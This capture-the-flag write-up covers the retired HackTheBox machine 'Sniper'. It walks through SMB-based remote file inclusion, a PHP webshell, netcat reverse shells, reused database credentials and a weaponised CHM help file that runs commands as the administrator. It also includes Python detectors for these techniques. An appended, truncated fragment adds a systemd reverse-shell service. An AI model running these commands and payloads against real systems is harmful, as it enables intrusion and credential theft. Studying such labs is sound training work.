
Hackthebox.eu - Retired - Sniper


Recon

As always, I start with a simple up/down scan of all TCP ports to see what is open:


# nmap -T4 -p- -oX ./nmapb.xml sniper.htb


Then convert it to HTML to make it pretty:

xsltproc ./nmapb.xml -o nmapb.html



Then rescan the open ports with -A to fingerprint the OS and services:

nmap -T4 -A -p80,135,139,445,49667 sniper.htb -oX ./nmapf.xml


Then convert that to HTML too:

xsltproc ./nmapf.xml -o ./nmapf.html



Looks like we have a Windows box with IIS on port 80, plus RPC and SMB.


Let’s see what we get when browsing the IIS

A blog on the home page.


And this login for the “Client Portal”.


Tried registering a new user named admin to check for account enumeration...


Nope, it just let me create it, no problem.





No anonymous access on SMB.


No access on RPC either.


Exploit


Alright, so I’ve poked around.

I think this might be susceptible to RFI.


I found this in the blog page source:


<li><a href="/blog?lang=blog-en.php">English</a></li>


Looks like we can use “?lang” to call other sites.


I started up a new tool I found out about today called updog, which is like SimpleHTTPServer:


# updog -d /root/Desktop/HTB/Sniper/ -p 80


And just tried to call the HTML output of my nmap scan:

http://sniper.htb/blog/?lang=http://10.10.14.48/nmapf.html



So I don’t see it calling out to my web server to get the HTML file.


I found this blog post that says we might use SMB to get around any filter that blocks inclusion over HTTP:


http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html


So I started up an SMB server:

python /opt/impacket-master/examples/smbserver.py SHARE /root/Desktop/HTB/Sniper/ -smb2support


I added this from the blog to my /etc/samba/smbd.conf:

[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody


And changed my browser to point to:


http://sniper.htb/blog/?lang=\\10.10.14.48\SHare\nmapf.html

I get this error message, but I do see an SMB connection from sniper.htb to my SMB server.


I fought with this for a while, but the SMB connection using impacket’s smbserver.py kept closing and the PHP files weren’t loading. So I followed the blog’s approach of using the Samba server in Kali. I also moved to the newest Kali OS at this point.


I eventually got the PHP in the blog to open and let me poke around a bit.
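As an added example (not part of the original write-up), here is a small Python checker a defender could run over IIS W3C logs to flag lang= values of the kinds used above: remote URLs, UNC paths, PHP stream wrappers and directory traversal. The log lines are constructed, and only blog-en.php is on the page; the other allowlisted language file names are assumed.

```python
import re
from urllib.parse import parse_qs

# Language files the blog legitimately includes. Only blog-en.php appears in the
# write-up; the other two names are assumed for illustration.
ALLOWED_LANG = {"blog-en.php", "blog-fr.php", "blog-es.php"}

# PHP stream wrappers reachable through include() when URL includes are enabled.
PHP_WRAPPERS = {"php", "data", "phar", "expect", "file", "zip", "glob", "compress.zlib"}

def classify_lang(value: str) -> str:
    """Verdict for one lang= value: ok, unc-path, php-wrapper, remote-url, traversal, unknown."""
    v = value.strip()
    if v in ALLOWED_LANG:
        return "ok"
    if v.startswith("\\\\") or v.startswith("//"):
        return "unc-path"          # \\host\share\file.php pulled over SMB
    m = re.match(r"^([a-z][a-z0-9+.-]*)://", v, re.I)
    if m:
        return "php-wrapper" if m.group(1).lower() in PHP_WRAPPERS else "remote-url"
    if ".." in v:
        return "traversal"
    return "unknown"               # not allowlisted: worth a look, but no known vector

# Constructed IIS W3C-style log lines (date time s-ip cs-method cs-uri-stem
# cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status).
SAMPLE_LOG = """
2019-04-11 22:45:36 10.10.10.151 GET /blog/ lang=blog-en.php 80 - 10.10.14.48 Mozilla/5.0 - 200
2019-04-11 22:46:01 10.10.10.151 GET /blog/ lang=http://10.10.14.48/nmapf.html 80 - 10.10.14.48 Mozilla/5.0 - 200
2019-04-11 22:47:12 10.10.10.151 GET /blog/ lang=\\\\10.10.14.48\\ica\\nmapf.html 80 - 10.10.14.48 Mozilla/5.0 - 200
2019-04-11 22:48:00 10.10.10.151 GET /blog/ lang=..\\..\\..\\windows\\win.ini 80 - 10.10.14.48 Mozilla/5.0 - 200
"""

def scan_log(text: str) -> list:
    """Return (client_ip, lang_value, verdict) for every request whose lang is not allowlisted."""
    hits = []
    for line in text.strip().splitlines():
        fields = line.split()
        if len(fields) < 12 or fields[5] == "-":
            continue                       # malformed line or no query string
        for lang in parse_qs(fields[5]).get("lang", []):
            verdict = classify_lang(lang)
            if verdict != "ok":
                hits.append((fields[8], lang, verdict))
    return hits
```

Running scan_log(SAMPLE_LOG) flags the HTTP, UNC and traversal requests from 10.10.14.48 and ignores the legitimate blog-en.php include.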



I found this interesting file under the /user folder:


Db.php


Looks like a username and password:


Username: dbuser
Password: 36mEAhz/B8xQ~2VM
Database: sniper


Playing around trying to get a better shell.


I did get a PoC pingback.


My PHP code:


<?php  shell_exec('ping 10.10.14.48');?>


Saved as rs.php.



It does indeed get a pingback from the server.



This gets a pingback with either exec() or shell_exec().


I found a much better PHP shell:

https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php


I stuck this in my /var/www/html/pub share.





So much cleaner, and the cmd actually works.





So we have a user named chris.


We have no write access on the box at all, so nowhere to store our PowerShell scripts or netcat to get a reverse shell.


However, we do still have our SMB share.


I moved nc.exe to my SMB share and then, in the PHP shell:


net use X: \\10.10.14.48\ica


We can see it mapped the drive as X:.


Now we should be able to use netcat to get our reverse shell.



Make sure we are listening on our Kali box.


Then on the PHP shell:


X:\nc.exe 10.10.14.48 443 -e C:\Windows\System32\cmd.exe



And...



We gotsta shell!!!!!!







Now let’s try and get some info out of the DB we saw earlier.


For some reason I couldn’t get any response from just cmd, so I loaded it up in PowerShell.


Used this command to connect:


./mysql.exe --user=dbuser --password=36mEAhz/B8xQ~2VM  sniper


Since we saw earlier that the table was called users, I just did:

Select * From users;



We know from login.php that the password is stored as an MD5 hash.


id      username        email   password        trn_date

1       superuser       admin@sniper.co 6e573c8b25e9168e0c61895d821a3d57        2019-04-11 22:45:36


Popped that into an online hash lookup:

https://www.md5online.org/md5-decrypt.html



So, user: superuser
Password: $uperpassw0rd



I tried getting some escalation with this account but couldn’t get anywhere.


But what about the dbuser password? 36mEAhz/B8xQ~2VM


I wonder if maybe that might be the password for the chris account.


I tried to connect to the SMB share on sniper using chris and that password.



Yup password reuse FTW!!!


It took me forever to find the commands and get the syntax right for this next part.


Basically, we are going to use PowerShell to build a credential object for chris and then launch a new netcat connection back to our attacking box:


powershell
$username = 'sniper\chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-Command -Credential $credential -Computer localhost -ScriptBlock {\\10.10.14.48\ica\nc.exe 10.10.14.48 55555 -e C:\windows\system32\cmd.exe}



Connected!


Let’s get that user hash:


type user.txt

21f************************************



Looking around, I found a directory under C:\ named Docs.


It contains a TXT file and a nice note from the CEO.


I also found an instructions.chm under the Downloads folder.


What is a CHM file you ask?


Basically a help file that is really just some HTML pages:

https://en.wikipedia.org/wiki/Microsoft_Compiled_HTML_Help


Cool, how do you read a CHM file from the command line?


You can use hh.exe, which is included with Windows... How nice of them.


https://stackoverflow.com/questions/7603637/decompiling-chm-file-hh-exe-requires-only-the-filename-no-full-path-is-allowed


Here is the output of the decompiled file:


>hh.exe -decompile output instructions.chm

C:\temp\output>type a.html
type a.html
<html>
<body>
<h1>Sniper Android App Documentation</h1>

<h2>Table of Contents</h2>

<p>Pff... This dumb CEO always makes me do all the shitty work. SMH!</p>
<p>I'm never completing this thing. Gonna leave this place next week. Hope someone snipes him.</p>
</body>
</html>



But what might be more interesting than that is that you can open web pages with hh.exe too, since it is essentially just reading HTML files...


And you might be able to use HH.exe to bypass AV if they don’t scan what it opens...



I wanted to get the instructions.chm onto my Samba share, so I had to make some changes to the config file and restart the service.


I added:

[ica]
path = /var/www/html/pub
public = yes
browseable = yes
create mask = 0777
read only = no
directory mode = 0777
force user = root


Then restarted the service:

service smbd restart



Now I can copy this file to my Samba share.



I went ahead and grabbed the TXT file from the other directory too.




I found this gist to get the next part going:


https://gist.github.com/mgeeky/cce31c8602a144d8f2172a73d510e0e7


I modified it at first just to ping back to my Kali box.


I inserted this into the HTML of a decompiled CHM file I had on my Windows box (it was an NVIDIA CHM), then saved the file as ping.htm:



<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/c ping 10.10.14.48'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>




Created a project.hpp.


With this inside:

[OPTIONS]

[FILES]
C:\Users\*********\Desktop\chm\ping.htm


Compiled it using:


C:\Users\*********\Desktop\chm\output>"C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hpp



Copied it over to my Kali box.


Then I copied it into the directory the boss told me to put the documentation in: C:\docs



And I got a pingback, which I assume happens when the boss opens the CHM file to look at my documentation :)


Now we just need to get it to execute something so we can get a shell as our boss once he opens the documentation.



I spent a lot of time here trying to get this shell back, but it seems like even though the CHM file executes as the boss, there isn’t actually a session for me to grab hold of...



So what about just writing the file out to a place we can read?


I put this line in my HTML file:

  <PARAM name="Item1" value=',cmd.exe, /c type C:\Users\administrator\Desktop\root.txt > C:\temp\root.txt'>

Recompiled my CHM and renamed it to Project-type.chm.


Moved it to my SMB share.



Copied it to C:\docs.


After a minute my CHM disappeared, as is usual for CHM files in the C:\docs directory, which emulates the box reading the documentation and moving it to another location.



Then, in the C:\temp folder we created, we see our root.txt.
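From the defender’s side, the HHCtrl ShortCut object used above is easy to spot once a CHM is decompiled with hh.exe -decompile. Here is an added example (not from the original write-up) in Python that walks the extracted HTML and reports every OBJECT using the HTML Help control CLSID with Command=ShortCut, together with the command line in Item1; the sample pages are constructed from the snippets shown on this page.

```python
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (HHCtrl), as used in the OBJECT tag above.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

class ShortcutFinder(HTMLParser):
    """Collect every HHCtrl OBJECT whose Command is ShortCut, with its Item1."""
    def __init__(self):
        super().__init__()
        self.findings = []      # dicts: {"id", "command", "item1"}
        self._current = None    # HHCtrl OBJECT being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)         # HTMLParser lowercases tag and attribute names
        if tag == "object":
            clsid = (a.get("classid") or "").lower().replace("clsid:", "")
            if clsid == HHCTRL_CLSID:
                self._current = {"id": a.get("id"), "command": None, "item1": None}
        elif tag == "param" and self._current is not None:
            name = (a.get("name") or "").lower()
            if name in ("command", "item1"):
                self._current[name] = a.get("value")

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            if (self._current["command"] or "").lower() == "shortcut":
                self.findings.append(self._current)
            self._current = None

def find_chm_shortcuts(html: str) -> list:
    """Return the ShortCut objects found in one decompiled CHM page."""
    parser = ShortcutFinder()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed samples: the decompiled a.html body from the box, and a page
# carrying the ping-back shortcut object shown in the write-up.
BENIGN = "<html><body><h1>Sniper Android App Documentation</h1></body></html>"
SUSPECT = """<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/c ping 10.10.14.48'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>x.Click();</SCRIPT>"""
```

Point find_chm_shortcuts at each .htm/.html file in the hh.exe -decompile output directory; any hit with a cmd.exe or powershell.exe Item1 deserves a close look before the file is opened.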



Now we can read it!!!!!





I know that technically we could use this to completely take over the box, but it just feels cheap writing root.txt out to a location we can read.





Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The